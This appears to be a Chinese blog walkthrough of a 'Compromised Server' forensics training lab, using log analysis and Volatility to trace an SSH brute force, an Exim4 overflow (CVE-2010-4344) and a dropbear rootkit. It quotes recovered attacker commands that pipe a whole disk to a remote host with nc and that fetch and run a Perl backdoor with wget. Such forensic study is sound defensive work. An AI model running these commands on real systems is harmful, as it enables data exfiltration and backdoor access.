Compromised Server--取证训练

任提供了三个文件
在这里插入图片描述
都解压开来
在这里插入图片描述
图中这三个img格式的镜像文件就是我们需要分析的重点

首先安装volatility,待会儿会用到
在这里插入图片描述
查看帮助信息
在这里插入图片描述
说明可以使用了

  1. 什么服务以及那个账户触发了警报
    将镜像挂载到mnt
    在这里插入图片描述
    查看日志
    在这里插入图片描述
    将结果往下拉,可以看到大量的无效登录
    在这里插入图片描述
    可以分析出ssh服务被暴力攻击,攻击者攻击的账户名是ulysses

  2. 在目标服务器上运行着哪种操作系统?(包括OS,CPU等信息)
    输入下图命令
    在这里插入图片描述
    可以看出是debian发行版5.0
    然后去查看dmesg
    在这里插入图片描述
    结果如下
    在这里插入图片描述
    可以看到具体的版本信息,系统内核版本2.6.26
    在这里插入图片描述
    内存信息
    在这里插入图片描述
    缓存信息等

在使用volatility进行分析前,我们必须指定相应的file,由前面得出的linux发行版的信息,我们使用网上公开分享的proifle,本次需要使用debian5.0的
将下载得到的profile放在指定目录volatility/plugins/overlays/linux

在这里插入图片描述
运行volatility,看看是否正确加载我们添加的profile
在这里插入图片描述
第一行就是我们添加的
现在回到我们的实验中,第二个问题还没结束,我们可以使用进一步查看CPU的相关信息
在这里插入图片描述

3.目标服务器上哪些进程正在运行
在这里插入图片描述
查看导出的文件

在这里插入图片描述
3. 攻击者的ip和目标主机的ip
分析这个问题可以从日志入手
我们回到前面挂载的镜像
在这里插入图片描述
查看maillog
在这里插入图片描述在这里插入图片描述

再查看rejectlog
在这里插入图片描述在这里插入图片描述

mail log和reject日志显示攻击者在192.168.56.1和192.168.56.101处发送的邮件。
再查看authlog

在这里插入图片描述在这里插入图片描述
auth.log还显示攻击者在192.168.56.1上多次尝试ssh登录。

另外在使用volatility分析连接时,我们输入下图的命令

在这里插入图片描述在这里插入图片描述
可以看到目标主机ip 192.168.56.102和攻击主机 192.168.56.1在4444和8888端口建立了连接

5.什么服务被攻击了
从前面exim4的mainlog日志就可以看到攻击者发送的电子邮件数据太大并且似乎包含一些恶意命令,如调用服务器192.168.56.1来下载文件c.pl和rk.tar等
可见,被攻击的服务是exim4

6.对于目标服务器发动的是什么攻击
通过搜索引擎查询可以判断出是关于Exim4的缓冲区溢出攻击,CVE-2010-4344
详情可参考
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4344
7.攻击者有哪些收获?
按照/root/.bash_history中观察到的历史记录

在这里插入图片描述在这里插入图片描述
很明显攻击者通过下面提到的命令发送了驱动器sda1的整个副本
dd if=/dev/sda1 | nc 192.168.56.1 4444
8.攻击者下载了哪些文件,并分析
还是由上面的分析可以知道攻击者已经下载了两个文件c.pl和rk.tar,两个文件都在/ tmp中找到。
在这里插入图片描述
对c.pl的简单分析表明,它是一个perl脚本,用于创建一个c程序,该程序编译后提供一个支持SUID的可执行文件并打开一个后门并向攻击者传输信息。
在这里插入图片描述
攻击者下载c.pl并且编译的SUID在端口4444中打开到192.168.56.1的连接,
wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444
换种方式,使用volatility也可以得出这一结论
在这里插入图片描述
rk.tar是一个压缩形式的dropbear rootkit。 解压缩文件夹包含以下内容
在这里插入图片描述
进入解压后的文件夹
在这里插入图片描述
看一下shell脚本
在这里插入图片描述
是典型的用于监听端口和正在被设置的家目录的变量文件
再看看install.sh
在这里插入图片描述
install.sh创建vars.sh中指定的rkhome目录。 它将自己添加到要启动的所有init文件中,并在端口44965中作为后门shell启动dropbear。
在这里插入图片描述
iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP,显示攻击者试图打开防火墙接受入站连接,但iptables的语法显示他已经删除了所有出站连接。 它应该是入站并接受45295的连接。

9.请列出网络连接及相应的状态(listen、established、close)
Established :
在这里插入图片描述
Listen
在这里插入图片描述
Close
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值